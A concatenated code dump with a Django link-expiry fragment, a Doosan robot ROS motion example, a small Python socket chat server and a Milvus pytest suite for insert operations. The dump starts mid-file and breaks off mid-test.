short_url = models.ForeignKey(Link, on_delete=models.CASCADE)
def __str__(self):
return str(self.short_url)
# run links expiring thread
from .terminator import expire
from threading import Thread
terminator = Thread(target=expire)
terminator.start()
|
dsr_service_motion_simple.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ##
# @brief [py example simple] motion basic test for doosan robot
# @author Kab Kyoum Kim (kabkyoum.kim@doosan.com)
import rospy
import os
import threading, time
import sys
sys.dont_write_bytecode = True
sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__),"../../../../common/imp")) ) # get import path : DSR_ROBOT.py
# for single robot
ROBOT_ID = "dsr01"
ROBOT_MODEL = "m1013"
import DR_init
DR_init.__dsr__id = ROBOT_ID
DR_init.__dsr__model = ROBOT_MODEL
from DSR_ROBOT import *
def shutdown():
print("shutdown time!")
print("shutdown time!")
print("shutdown time!")
pub_stop.publish(stop_mode=STOP_TYPE_QUICK)
return 0
def msgRobotState_cb(msg):
msgRobotState_cb.count += 1
if (0==(msgRobotState_cb.count % 100)):
rospy.loginfo("________ ROBOT STATUS ________")
print(" robot_state : %d" % (msg.robot_state))
print(" robot_state_str : %s" % (msg.robot_state_str))
print(" actual_mode : %d" % (msg.actual_mode))
print(" actual_space : %d" % (msg.actual_space))
print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
print(" current_velj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_velj[0],msg.current_velj[1],msg.current_velj[2],msg.current_velj[3],msg.current_velj[4],msg.current_velj[5]))
print(" joint_abs : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.joint_abs[0],msg.joint_abs[1],msg.joint_abs[2],msg.joint_abs[3],msg.joint_abs[4],msg.joint_abs[5]))
print(" joint_err : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.joint_err[0],msg.joint_err[1],msg.joint_err[2],msg.joint_err[3],msg.joint_err[4],msg.joint_err[5]))
print(" target_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.target_posj[0],msg.target_posj[1],msg.target_posj[2],msg.target_posj[3],msg.target_posj[4],msg.target_posj[5]))
print(" target_velj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.target_velj[0],msg.target_velj[1],msg.target_velj[2],msg.target_velj[3],msg.target_velj[4],msg.target_velj[5]))
print(" current_posx : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posx[0],msg.current_posx[1],msg.current_posx[2],msg.current_posx[3],msg.current_posx[4],msg.current_posx[5]))
print(" current_velx : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_velx[0],msg.current_velx[1],msg.current_velx[2],msg.current_velx[3],msg.current_velx[4],msg.current_velx[5]))
print(" task_err : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.task_err[0],msg.task_err[1],msg.task_err[2],msg.task_err[3],msg.task_err[4],msg.task_err[5]))
print(" solution_space : %d" % (msg.solution_space))
sys.stdout.write(" rotation_matrix : ")
for i in range(0 , 3):
sys.stdout.write( "dim : [%d]"% i)
sys.stdout.write(" [ ")
for j in range(0 , 3):
sys.stdout.write("%d " % msg.rotation_matrix[i].data[j])
sys.stdout.write("] ")
print ##end line
print(" dynamic_tor : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.dynamic_tor[0],msg.dynamic_tor[1],msg.dynamic_tor[2],msg.dynamic_tor[3],msg.dynamic_tor[4],msg.dynamic_tor[5]))
print(" actual_jts : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_jts[0],msg.actual_jts[1],msg.actual_jts[2],msg.actual_jts[3],msg.actual_jts[4],msg.actual_jts[5]))
print(" actual_ejt : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_ejt[0],msg.actual_ejt[1],msg.actual_ejt[2],msg.actual_ejt[3],msg.actual_ejt[4],msg.actual_ejt[5]))
print(" actual_ett : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_ett[0],msg.actual_ett[1],msg.actual_ett[2],msg.actual_ett[3],msg.actual_ett[4],msg.actual_ett[5]))
print(" sync_time : %7.3f" % (msg.sync_time))
print(" actual_bk : %d %d %d %d %d %d" % (msg.actual_bk[0],msg.actual_bk[1],msg.actual_bk[2],msg.actual_bk[3],msg.actual_bk[4],msg.actual_bk[5]))
print(" actual_bt : %d %d %d %d %d " % (msg.actual_bt[0],msg.actual_bt[1],msg.actual_bt[2],msg.actual_bt[3],msg.actual_bt[4]))
print(" actual_mc : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_mc[0],msg.actual_mc[1],msg.actual_mc[2],msg.actual_mc[3],msg.actual_mc[4],msg.actual_mc[5]))
print(" actual_mt : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.actual_mt[0],msg.actual_mt[1],msg.actual_mt[2],msg.actual_mt[3],msg.actual_mt[4],msg.actual_mt[5]))
#print digital i/o
sys.stdout.write(" ctrlbox_digital_input : ")
for i in range(0 , 16):
sys.stdout.write("%d " % msg.ctrlbox_digital_input[i])
print ##end line
sys.stdout.write(" ctrlbox_digital_output: ")
for i in range(0 , 16):
sys.stdout.write("%d " % msg.ctrlbox_digital_output[i])
print
sys.stdout.write(" flange_digital_input : ")
for i in range(0 , 6):
sys.stdout.write("%d " % msg.flange_digital_input[i])
print
sys.stdout.write(" flange_digital_output : ")
for i in range(0 , 6):
sys.stdout.write("%d " % msg.flange_digital_output[i])
print
#print modbus i/o
sys.stdout.write(" modbus_state : " )
if len(msg.modbus_state) > 0:
for i in range(0 , len(msg.modbus_state)):
sys.stdout.write("[" + msg.modbus_state[i].modbus_symbol)
sys.stdout.write(", %d] " % msg.modbus_state[i].modbus_value)
print
print(" access_control : %d" % (msg.access_control))
print(" homming_completed : %d" % (msg.homming_completed))
print(" tp_initialized : %d" % (msg.tp_initialized))
print(" mastering_need : %d" % (msg.mastering_need))
print(" drl_stopped : %d" % (msg.drl_stopped))
print(" disconnected : %d" % (msg.disconnected))
msgRobotState_cb.count = 0
def thread_subscriber():
rospy.Subscriber('/'+ROBOT_ID +ROBOT_MODEL+'/state', RobotState, msgRobotState_cb)
rospy.spin()
#rospy.spinner(2)
if __name__ == "__main__":
rospy.init_node('dsr_service_motion_simple_py')
rospy.on_shutdown(shutdown)
t1 = threading.Thread(target=thread_subscriber)
t1.daemon = True
t1.start()
pub_stop = rospy.Publisher('/'+ROBOT_ID +ROBOT_MODEL+'/stop', RobotStop, queue_size=10)
set_velx(30,20) # set global task speed: 30(mm/sec), 20(deg/sec)
set_accx(60,40) # set global task accel: 60(mm/sec2), 40(deg/sec2)
velx=[50, 50]
accx=[100, 100]
p1= posj(0,0,0,0,0,0) #joint
p2= posj(0.0, 0.0, 90.0, 0.0, 90.0, 0.0) #joint
x1= posx(400, 500, 800.0, 0.0, 180.0, 0.0) #task
x2= posx(400, 500, 500.0, 0.0, 180.0, 0.0) #task
c1 = posx(559,434.5,651.5,0,180,0)
c2 = posx(559,434.5,251.5,0,180,0)
q0 = posj(0,0,0,0,0,0)
q1 = posj(10, -10, 20, -30, 10, 20)
q2 = posj(25, 0, 10, -50, 20, 40)
q3 = posj(50, 50, 50, 50, 50, 50)
q4 = posj(30, 10, 30, -20, 10, 60)
q5 = posj(20, 20, 40, 20, 0, 90)
qlist = [q0, q1, q2, q3, q4, q5]
x1 = posx(600, 600, 600, 0, 175, 0)
x2 = posx(600, 750, 600, 0, 175, 0)
x3 = posx(150, 600, 450, 0, 175, 0)
x4 = posx(-300, 300, 300, 0, 175, 0)
x5 = posx(-200, 700, 500, 0, 175, 0)
x6 = posx(600, 600, 400, 0, 175, 0)
xlist = [x1, x2, x3, x4, x5, x6]
X1 = posx(370, 670, 650, 0, 180, 0)
X1a = posx(370, 670, 400, 0, 180, 0)
X1a2= posx(370, 545, 400, 0, 180, 0)
X1b = posx(370, 595, 400, 0, 180, 0)
X1b2= posx(370, 670, 400, 0, 180, 0)
X1c = posx(370, 420, 150, 0, 180, 0)
X1c2= posx(370, 545, 150, 0, 180, 0)
X1d = posx(370, 670, 275, 0, 180, 0)
X1d2= posx(370, 795, 150, 0, 180, 0)
seg11 = posb(DR_LINE, X1, radius=20)
seg12 = posb(DR_CIRCLE, X1a, X1a2, radius=21)
seg14 = posb(DR_LINE, X1b2, radius=20)
seg15 = posb(DR_CIRCLE, X1c, X1c2, radius=22)
seg16 = posb(DR_CIRCLE, X1d, X1d2, radius=23)
b_list1 = [seg11, seg12, seg14, seg15, seg16]
while not rospy.is_shutdown():
movej(p2, vel=100, acc=100)
movejx(x1, vel=30, acc=60, sol=0)
movel(x2, velx, accx)
movec(c1, c2, velx, accx)
movesj(qlist, vel=100, acc=100)
movesx(xlist, vel=100, acc=100)
move_spiral(rev=9.5,rmax=20.0,lmax=50.0,time=20.0,axis=DR_AXIS_Z,ref=DR_TOOL)
move_periodic(amp =[10,0,0,0,30,0], period=1.0, atime=0.2, repeat=5, ref=DR_TOOL)
moveb(b_list1, vel=150, acc=250, ref=DR_BASE, mod=DR_MV_MOD_ABS)
print('good bye!')
|
Server.py
|
import socket
from threading import Thread
import time
data = open("../assets/version.txt" , "r").read()
print("Chat Room 101 | " + data)
time.sleep(1)
clients = {}
addresses = {}
host = socket.gethostname()
ip = socket.gethostbyname(host)
port = 8080
s = socket.socket()
s.bind((host,port))
print(host, ip)
print("Ask clients to enter host IP as :",ip,"and port as :",port)
def accept_client():
while (True):
client_con,client_address=s.accept()
client_con.send("Hey! Welcome to the Chat Room. Enter Your Name To Continue.".encode("utf8"))
addresses[client_address] = client_address
t2 = Thread(target=handle_client,args=(client_con,client_address)).start()
print(client_address, "Has Connected")
def broadcast(message, prefix=""):
for x in clients:
x.send(bytes(prefix, "utf8") +message)
def handle_client(con,adr):
name = con.recv(1024).decode("utf8")
welcome_message = "Thanks for using this Chat Room " + name + ". You can use #quit if you want to exit"
con.send(bytes(welcome_message, "utf8"))
print(name,"has joint the chat")
message = name + " has joint the chat!"
broadcast(bytes(message, "utf8"))
clients[con] = name
try:
while(True):
message = con.recv(1024)
if(message != bytes("#quit", "utf8")):
broadcast(message, name + ": ")
else:
con.close()
del clients[con]
broadcast(bytes(name + " has left the chat.", "utf8"))
except:
print(name + " has left the chat")
if __name__ == "__main__":
s.listen()
print("The Server Is Now Online")
t1 = Thread(target=accept_client)
t1.start()
t1.join() # Waits for one thread to stop before running the next.
|
test_insert.py
|
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
logging.getLogger().info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
"""
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
"""
collection_name = gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after entities
method: insert entities and build index
expected: no error raised
"""
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after vector
method: insert entities and build index
expected: no error raised
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
"""
target: test search entity after insert entity after a while
method: insert entity, sleep, and search collection
expected: no error raised
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
result = connect.insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim, ids)
logging.getLogger().info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
"""
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
"""
result = connect.insert(collection, default_entities, partition_name=default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
"""
delete_nums = 500
disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
"""
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
"""
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_multi_times(self, connect, binary_collection):
"""
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
"""
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
"""
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
"""
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1,
metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert len(res[0]) == default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, gen_entities(nb), _async=False)
